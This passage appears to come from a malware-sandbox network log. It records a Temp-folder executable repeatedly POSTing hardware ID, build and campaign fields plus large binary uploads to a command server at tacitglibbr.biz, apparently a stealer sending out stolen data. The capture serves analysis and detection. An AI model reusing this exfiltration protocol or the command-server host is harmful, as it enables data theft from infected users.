name="hwid"1DB2EE5486F2277BAC8923850305D13E--O6PDASSKP6S07Content-Disposition: form-data; name="pid"1--O6PDASSKP6S07Content-Disposition: form-data; name="lid"PsFKDg--pablo--O6PDASSKP6S
2024-12-16 10:04:31 UTC	1011	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r0j2s29n3np59f7j27nmv9ad93; expires=Fri, 11-Apr-2025 03:51:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mv0YZGUgUAiubJAvMRq%2B72KLJbVK9EUY6CJyWXFLyDr116wJ2ICRyUYZ8JMYb8lQYQPCcvgjU%2Fnq8v3DzmRw3JqGEf7PFDStBpQpF65siuUDIvcYH7Tobx1AQzKkX4fo650%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd98228b77d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1756&rtt_var=680&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2213&delivery_rate=1584373&cwnd=242&unsent_bytes=0&cid=0aa79abc1e05ea1b&ts=1604&x=0"
2024-12-16 10:04:31 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-16 10:04:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50066	104.21.50.161	443	7480	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:30 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VHNVHI68B2BD33 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12811 Host: tacitglibbr.biz
2024-12-16 10:04:30 UTC	12811	OUT	Data Raw: 2d 2d 56 48 4e 56 48 49 36 38 42 32 42 44 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 48 4e 56 48 49 36 38 42 32 42 44 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 48 4e 56 48 49 36 38 42 32 42 44 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 56 48 4e 56 48 49 36 38 Data Ascii: --VHNVHI68B2BD33Content-Disposition: form-data; name="hwid"1DB2EE5486F2277BAC8923850305D13E--VHNVHI68B2BD33Content-Disposition: form-data; name="pid"2--VHNVHI68B2BD33Content-Disposition: form-data; name="lid"PsFKDg--pablo--VHNVHI68
2024-12-16 10:04:32 UTC	1018	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8deasubr96ounbp7df1vkkpjmf; expires=Fri, 11-Apr-2025 03:51:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qm8aziz8hYgI%2BgXyThBF08mCHqw6a0RQmrLV%2Bo%2Fs0tXAM6BRDTcel9W%2BY7SkpaENd52aOwGySFJOgCVekQcWz1TT9DI1zio7GZW3DNc4HJPYyEJNX5T58Zk8foG3b6YbXhw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd9848cac0c8e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1500&min_rtt=1496&rtt_var=570&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13746&delivery_rate=1904761&cwnd=181&unsent_bytes=0&cid=e8a859a83d2d6351&ts=1660&x=0"
2024-12-16 10:04:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-16 10:04:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50091	104.21.50.161	443	2876	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:35 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IPMMJMRV2G User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 551139 Host: tacitglibbr.biz
2024-12-16 10:04:35 UTC	15331	OUT	Data Raw: 2d 2d 49 50 4d 4d 4a 4d 52 56 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 50 4d 4d 4a 4d 52 56 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 50 4d 4d 4a 4d 52 56 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 49 50 4d 4d 4a 4d 52 56 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d Data Ascii: --IPMMJMRV2GContent-Disposition: form-data; name="hwid"1DB2EE5486F2277BAC8923850305D13E--IPMMJMRV2GContent-Disposition: form-data; name="pid"1--IPMMJMRV2GContent-Disposition: form-data; name="lid"PsFKDg--pablo--IPMMJMRV2GContent-
2024-12-16 10:04:35 UTC	15331	OUT	Data Raw: 27 cb 9d f5 06 a6 6c 6a 31 d7 d6 1f 86 cf 4a f5 37 49 ad bc 9b 6a 96 1b fb 66 40 52 9a c1 7d 29 d4 50 84 b7 84 16 3f f4 5a 68 fe 53 db 3f 86 b1 c6 c8 58 d5 e4 20 0c b2 7c 4e 66 12 d2 03 21 c9 ad 39 6d d7 f8 44 d1 fd 86 c6 0f 8d df 87 4c 46 91 95 ef 39 d8 42 79 06 08 75 85 af 46 2d 43 be c4 f8 84 a0 b9 d5 c2 55 f7 12 68 ca b9 e0 a9 e5 1f fa cc 1b 0d 4d 33 e8 1a 7c ae 27 74 57 fd 07 be 2f f6 98 52 31 2e 2d 3c a0 c4 de 43 50 20 58 0a bf 79 6d d2 3a 51 80 b2 34 a9 f6 3d 29 2c ea c2 56 74 f0 89 c8 fd 74 af 3f 64 ca da da 5c 50 a1 2b 38 32 b8 aa c8 e8 bb 63 8f 04 c7 91 e4 c3 38 ff 44 c8 dd 01 d4 92 9b 21 38 88 3b 26 31 4a f1 67 6f 28 01 da 11 14 ec e3 16 fe ce 6f bc f2 a9 26 38 21 b1 f5 d2 67 2c d9 a1 e5 93 0e 28 1e 5f a1 95 1d a7 f2 c6 9b 82 e6 8a ee ef 80 6e Data Ascii: 'lj1J7Ijf@R})P?ZhS?X \|Nf!9mDLF9ByuF-CUhM3\|'tW/R1.-<CP Xym:Q4=),Vtt?d\P+82c8D!8;&1Jgo(o&8!g,(_n
2024-12-16 10:04:35 UTC	15331	OUT	Data Raw: f3 4c b8 35 4b c3 3b 3b b6 ee 59 7a 4c 1d 65 40 d2 db 8b ab a2 24 74 ed 38 39 11 f5 56 b2 30 10 fd 69 98 12 17 1d 47 c1 ed 6e 43 dd b9 2d ea 13 ca 27 e6 91 22 e3 10 e1 66 73 02 2b 0c f1 fd 69 5c 70 45 b8 11 e5 9f 38 87 78 19 a0 a4 5c ca bf 50 db 11 8c d0 17 9c ad cd 60 48 6c ad ea 1b cf 28 fd 1e ad 32 1e ab ad 50 9e ea 4d 50 c1 67 c7 45 60 4a b7 dd da 88 f5 cc 4a 76 c6 60 d6 b7 82 54 53 85 b9 45 c1 23 2d 91 2c f7 85 df 38 e1 23 91 96 76 13 39 15 6d da 71 6b 9c 26 96 7b 41 d3 0c df 5c f3 b8 f1 d5 3b e1 a1 cd f5 23 eb be a6 b4 00 d1 36 b9 d4 88 3b bd ab 5a e4 af be c4 36 c3 8e 70 59 e6 b9 9a 3c 44 3b 6e 42 32 53 da 47 b0 fa 54 5b 16 ba 2b 24 7e c6 01 60 08 09 1f 85 e3 61 32 e6 e8 4b 1b dd 5c 1a 94 fc ee 8e a4 d4 f5 58 82 8a 47 b7 be 4c 20 47 6c cf 3c 73 c3 Data Ascii: L5K;;YzLe@$t89V0iGnC-'"fs+i\pE8x\P`Hl(2PMPgE`JJv`TSE#-,8#v9mqk&{A\;#6;Z6pY<D;nB2SGT[+$~`a2K\XGL Gl<s
2024-12-16 10:04:35 UTC	15331	OUT	Data Raw: 84 d0 01 e6 d4 91 9f 51 d8 2a c0 83 73 78 3b 0c e0 dd 39 e4 b1 74 67 72 f6 ff 3d 3b fc 14 e8 3a 83 b4 60 18 b9 69 40 ef 4e bf 0a ac dd f1 0d ed 7c 20 7e d6 bb 43 a7 2f d2 ad 58 ec e5 ab f4 80 16 0b 34 f9 1f d8 43 38 4e 02 de e3 12 56 aa 0a a4 ce 8b 32 3a ff 3c a1 33 b6 0f c3 8e 04 9b 62 9c df 69 9b 26 3c e0 e1 43 99 46 ea e4 fa e1 08 ea 7f 7f fc a6 14 ce ff 93 13 21 c6 77 33 c9 0c 76 08 04 82 64 c6 af 40 55 46 59 29 3d e9 06 a9 02 35 7d 91 fa 4d 80 91 2e 21 8e 86 93 1f c7 11 38 d1 25 62 2b bf ad c2 8f 7a f4 f1 7e c5 39 52 1b 77 35 e3 f7 34 2b af d4 69 65 29 26 8e 24 b9 a4 a3 c3 fb 4c 0f 56 a2 d9 d9 f8 b5 15 c7 35 61 81 dd 82 f9 05 64 3d ac 78 c7 cf 31 70 a4 99 a2 88 50 2d f6 4f 5a f5 b3 75 b9 c1 2c d5 3a 70 3f e5 70 9c a7 fe bc 55 6f a4 d6 54 1e 48 f6 ae Data Ascii: Q*sx;9tgr=;:`i@N\| ~C/X4C8NV2:<3bi&<CF!w3vd@UFY)=5}M.!8%b+z~9Rw54+ie)&$LV5ad=x1pP-OZu,:p?pUoTH
2024-12-16 10:04:35 UTC	15331	OUT	Data Raw: e7 bc 3b 3f c7 27 85 3f 80 a7 23 78 95 85 73 7d 1b de 1c 76 23 0d c9 49 7c ec 86 78 d3 64 a6 d1 07 85 ba ea c5 91 ce 8a 40 c9 df 67 94 19 0a 22 af 00 1d cf f1 d3 ce 8c 0e eb d0 f0 80 90 97 1c 13 82 38 de 40 89 89 2d be 41 46 91 43 71 2c 61 bf 9d 71 04 f2 63 c7 e5 ed 8e 11 93 0a 0c 64 85 f6 ed 39 c7 72 3f 75 c2 4b 4c 47 6c fb e7 f2 49 4d cc 7d b9 d0 3b ff 4e 27 b9 cf cc 90 d2 d6 24 37 13 bd f1 fb c0 b9 0f 4e 4d c6 9d 07 c1 cb c3 49 9e 7c 9c a5 3e 58 5b fb 34 a2 15 71 4d 21 d8 30 ed 8b 72 7f 37 84 68 71 4e 1d 1f 54 0c bd fc ef 2d a8 c2 c2 e7 e2 42 d6 59 97 40 5c 29 c4 20 c0 5f 03 31 96 10 48 9d 63 14 da 64 5e 90 d0 35 fa 01 65 d6 7e 98 d9 1c 45 91 b7 3e b6 3f 9e 69 c9 45 98 fb 8b 76 25 8b f1 8c c7 f7 3d 46 7c 87 66 c8 69 8a 4d ee b2 cb 67 20 8a 2a 4f f8 dd Data Ascii: ;?'?#xs}v#I\|xd@g"8@-AFCq,aqcd9r?uKLGlIM};N'$7NMI\|>X[4qM!0r7hqNT-BY@\) _1Hcd^5e~E>?iEv%=F\|fiMg *O
2024-12-16 10:04:35 UTC	15331	OUT	Data Raw: 0f 73 42 dc ce e6 af 73 66 ab 13 4a 8d d8 dd 52 a8 57 1a ac 76 ec 44 0f ac 68 d5 03 af 19 fe be 42 c2 11 c0 02 6b f9 0f 81 f5 05 7e 4d 7e 70 04 51 48 01 3a 6d 0b fc 39 19 b5 24 6d 4e 0c 2b a3 82 2b 06 aa de 79 fb ac 0c 7d 56 db 9a 67 8f fd e7 ad c0 11 06 ce 61 67 b0 20 96 17 68 2e b4 30 f9 8b ff 1c c7 a1 78 5e 68 d9 7d 8e 19 b2 ff 2a a4 5b 23 9d 32 2d a8 12 15 d1 9b bd 19 21 af 8a 90 66 d6 37 9f 24 47 4c 99 0b be ab d0 34 19 d0 f1 28 89 3c 44 5e f3 ec d0 9b ff 50 70 c0 c4 ef 37 ce 48 0f 2b 01 54 b0 51 a6 00 be 62 ad 8e 86 62 31 60 eb a9 b4 8e 0a c8 25 f8 da 69 42 1f 69 70 eb 65 88 61 29 b7 13 27 c2 60 a6 78 d7 ed 99 17 e3 a9 9b d1 f0 49 90 4c 50 f7 e1 c9 8c 20 87 98 b9 2a 0e 33 e2 31 b1 1d c7 be e4 1d a9 be 71 11 7e 8b df b9 c9 6c 67 da 98 36 df 8c 5c c4 Data Ascii: sBsfJRWvDhBk~M~pQH:m9$mN++y}Vgag h.0x^h}[#2-!f7$GL4(<D^Pp7H+TQbb1`%iBipea)'`xILP 31q~lg6\
2024-12-16 10:04:35 UTC	15331	OUT	Data Raw: 1e 6b e5 09 fc 19 ed 32 55 85 2e ff b7 0f cd 88 d1 b0 1c ff 55 9c 56 2d 21 e3 0f 9f df e9 5a c0 56 95 40 75 e1 9e 04 6a fd 38 61 93 79 34 ea bd b8 d6 38 f8 96 7a 22 2d 44 22 53 79 02 61 c7 a4 d8 87 ff e1 cb 53 64 91 10 ec 93 e7 ca 7e f7 07 37 df cb af 99 b5 d3 e6 e9 73 d3 2a 4b 30 62 87 e1 5e 4f be 93 14 71 74 52 0b 45 bb b7 d5 26 36 1a f6 1b 7d 53 af 39 de 9b 9d dd 56 02 59 3b 88 f0 53 f8 37 24 f0 57 1d 62 ff 0c 12 a5 60 3c e2 6d 4b db 21 9c 9a c2 c9 4b 0d ef 8c 51 5d 65 45 f7 14 72 12 35 c7 39 ae 2f 93 f0 56 f7 48 b3 86 7e d8 eb e7 64 68 89 de 09 70 5b 29 4b 60 aa 73 aa c0 1f b5 b7 cc 75 d0 a6 c5 24 cf bc dd 00 21 09 de 06 27 2e 23 2f ee 7b 51 98 08 e3 49 56 2e e9 e8 60 f8 96 0a 33 c7 87 5c 79 34 56 d9 91 da 2d ea e6 fa c5 fb ef fa a5 84 03 a3 27 ca 2c Data Ascii: k2U.UV-!ZV@uj8ay48z"-D"SyaSd~7s*K0b^OqtRE&6}S9VY;S7$Wb`<mK!KQ]eEr59/VH~dhp[)K`su$!'.#/{QIV.`3\y4V-',
2024-12-16 10:04:35 UTC	15331	OUT	Data Raw: 84 7f 21 eb 5f 5c 4f aa 56 42 63 9b dd db c5 ca f7 9e 73 48 af c4 f8 06 12 c8 84 86 32 2d 0a f6 d2 0d c2 40 8c b6 21 5e a8 61 c4 38 c4 b7 c3 fd e2 43 ec a5 3a 03 79 7c 31 ea 4a 3a e1 ee 61 b3 16 ef 4b 0f 08 99 4e 7e ec df 74 cb ec 1a e0 17 45 d5 fe f7 64 bc 38 38 24 f9 68 b7 df a0 70 31 70 77 7c ab 08 66 e5 10 13 a4 fc 00 8e 2f fa d4 17 75 da e9 e3 a4 af 34 67 4d 51 fa 52 63 74 13 12 35 90 56 0c 0a 87 f8 10 01 8a 50 6b 4f bf 45 b8 a1 f5 6a 8b a5 d4 39 5d 7c 7b 04 2d c0 bb 50 02 3c 85 89 ef 2e 08 93 72 1f 61 17 83 d6 fa 8f c4 18 fa 83 9d 29 91 be e7 4d 18 85 ef 52 97 ac 76 0e ca 17 1d 6e 40 90 9e a0 61 29 84 98 cc db 13 5a 3f a5 3c ce eb af 42 36 ac 8f 98 c0 0c a7 c9 98 d3 c1 cd 42 e9 d3 6d 19 b3 5c af a7 bc b2 de 3d 28 3f e3 2f 09 9f 7e 2b 41 27 d1 b1 94 Data Ascii: !_\OVBcsH2-@!^a8C:y\|1J:aKN~tEd88$hp1pw\|f/u4gMQRct5VPkOEj9]\|{-P<.ra)MRvn@a)Z?<B6Bm\=(?/~+A'
2024-12-16 10:04:35 UTC	15331	OUT	Data Raw: 60 e6 23 1c 7e 52 a5 dd 7e a1 1a 55 56 cf 5a 0c e6 e7 21 f1 10 92 bd 47 41 98 61 ad 9f fb 82 e8 87 fa ad 32 f4 c3 7b 38 93 22 8e a7 76 5a 7b 0b 5c e4 c8 66 e3 89 78 85 01 d6 58 50 81 97 59 4c 5c f4 ad 0a eb 2e d5 c1 56 f8 f7 8a f8 be d8 0d b1 9b dd 2c 55 de a0 4a b5 e8 ef 4d 66 dc e6 fc 87 d6 63 c3 0f dd a3 42 9c 08 f5 fb fb 47 94 56 99 ca e1 09 21 6a 21 43 65 51 08 fa ee f4 f8 30 50 16 c6 f7 02 5e 93 9e e3 a7 3d 58 5e ff 35 0c 9b ff f6 2e ef 02 b8 89 d4 9f c7 85 c0 b1 f7 f6 66 c4 e7 c5 48 f7 a6 0f 15 86 bf 6b e2 05 0a be 65 33 26 0e 17 8c 72 c3 27 0f e8 51 27 c7 3c 8e 3f a9 25 03 3d b1 69 80 70 bf 54 50 06 15 54 54 63 e9 51 c8 02 68 21 33 b9 0b a0 b4 fb f1 f5 ba b0 ff 43 77 a6 fa 8f d8 7c be ab d1 4e 3f 0a 0e e1 f4 07 f8 d9 12 e4 4c 00 2f 95 e1 3e 45 b0 Data Ascii: `#~R~UVZ!GAa2{8"vZ{\fxXPYL\.V,UJMfcBGV!j!CeQ0P^=X^5.fHke3&r'Q'<?%=ipTPTTcQh!3Cw\|N?L/>E
2024-12-16 10:04:35 UTC	15331	OUT	Data Raw: 0c bd f8 10 fe 43 5c 0c 4a 16 52 5f 10 2b 92 35 8e 98 4b e1 25 54 7e 9a c4 bf 69 91 ac 37 0a 22 b4 4a c3 7b 1f ae b9 26 98 4a 81 5e 93 0a 94 46 88 83 6c 04 a1 f7 e6 1e 56 72 eb 8f 4f a9 16 c6 07 d6 a7 1e 25 e1 35 84 db df e1 81 71 d2 e6 f9 09 fe fb e4 8f 3c 1b 50 7d a0 45 e0 7d a1 4e a8 f7 bc e2 a5 af 71 91 74 5b e6 42 84 fb c0 84 a9 de e7 60 9a 26 ba c6 c8 b8 4b 17 84 ce ff 9c ce 30 1a 88 fa a4 cd 71 1d 6f 59 b7 69 d9 ec e0 1b 8d 69 15 44 f8 f4 90 7e e0 02 ef 5f 33 7e bd 85 68 6c 42 7f 2c 61 b3 a8 72 a2 de 7d 20 99 37 23 ce fa d5 93 5c f9 66 70 f3 79 e5 fa 80 4d 39 ed 26 eb d7 9c 42 01 6d 91 15 c4 3d 27 0a d1 16 87 08 01 a4 cc b0 0f 95 9b 05 63 ae 3e 8c 10 ee 50 b3 78 50 35 36 a2 7a 05 4f 1d d8 30 66 6f 24 08 73 df 6e 64 3b 6f a4 5c 28 5e bf 37 f7 d6 9a Data Ascii: C\JR_+5K%T~i7"J{&J^FlVrO%5q<P}E}Nqt[B`&K0qoYiiD~_3~hlB,ar} 7#\fpyM9&Bm='c>PxP56zO0fo$snd;o\(^7
2024-12-16 10:04:39 UTC	1023	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kfv7d8q3hp170bs2rlqf9s16qi; expires=Fri, 11-Apr-2025 03:51:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kvTo18hDZZeyOpRpCEE9aUitkLgYv08czcTfmD%2FViZbHuRRPvugELE9oBcn45dXDWLLXKTzlQ9cRer8jzN0U55tP8jx%2F%2FtZR2TK%2FU9tu%2BE3iO3rKGGgubqKCxEKyGF3NXEs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd9a42f2f4299-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1548&min_rtt=1541&rtt_var=593&sent=321&recv=573&lost=0&retrans=0&sent_bytes=2840&recv_bytes=553611&delivery_rate=1821584&cwnd=251&unsent_bytes=0&cid=32cd06e27a8db7d9&ts=3710&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50092	104.21.50.161	443	7480	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:36 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3RSVXKIULC0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15035 Host: tacitglibbr.biz
2024-12-16 10:04:36 UTC	15035	OUT	Data Raw: 2d 2d 33 52 53 56 58 4b 49 55 4c 43 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 52 53 56 58 4b 49 55 4c 43 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 52 53 56 58 4b 49 55 4c 43 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 33 52 53 56 58 4b 49 55 4c 43 30 0d 0a 43 6f 6e 74 Data Ascii: --3RSVXKIULC0Content-Disposition: form-data; name="hwid"1DB2EE5486F2277BAC8923850305D13E--3RSVXKIULC0Content-Disposition: form-data; name="pid"2--3RSVXKIULC0Content-Disposition: form-data; name="lid"PsFKDg--pablo--3RSVXKIULC0Cont
2024-12-16 10:04:37 UTC	1018	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=iv9fp809b9nfhchbao13ecr4uo; expires=Fri, 11-Apr-2025 03:51:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FmN%2Bd880ioANs0bN8fvaS5nIInMbHM70r61u1URnFQacPHgL4PLwnG6IhHWIIm21HHzUsROa%2BsPadpYkKGBuXPQ3Vs%2BgDlpm%2BjVNMzHRiRZW3ONZoe0Z8naQJ0w3MVpzw4I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd9a61fb80f6b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1522&min_rtt=1512&rtt_var=574&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15967&delivery_rate=1931216&cwnd=210&unsent_bytes=0&cid=7491a44f37c30f72&ts=1757&x=0"
2024-12-16 10:04:37 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-16 10:04:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50098	104.21.50.161	443	7480	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:40 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HJ11TQAXQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20513 Host: tacitglibbr.biz
2024-12-16 10:04:40 UTC	15331	OUT	Data Raw: 2d 2d 48 4a 31 31 54 51 41 58 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 4a 31 31 54 51 41 58 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 4a 31 31 54 51 41 58 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 48 4a 31 31 54 51 41 58 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 Data Ascii: --HJ11TQAXQContent-Disposition: form-data; name="hwid"1DB2EE5486F2277BAC8923850305D13E--HJ11TQAXQContent-Disposition: form-data; name="pid"3--HJ11TQAXQContent-Disposition: form-data; name="lid"PsFKDg--pablo--HJ11TQAXQContent-Disp
2024-12-16 10:04:40 UTC	5182	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82 Data Ascii: un 4F([:7s~X`nO`i`
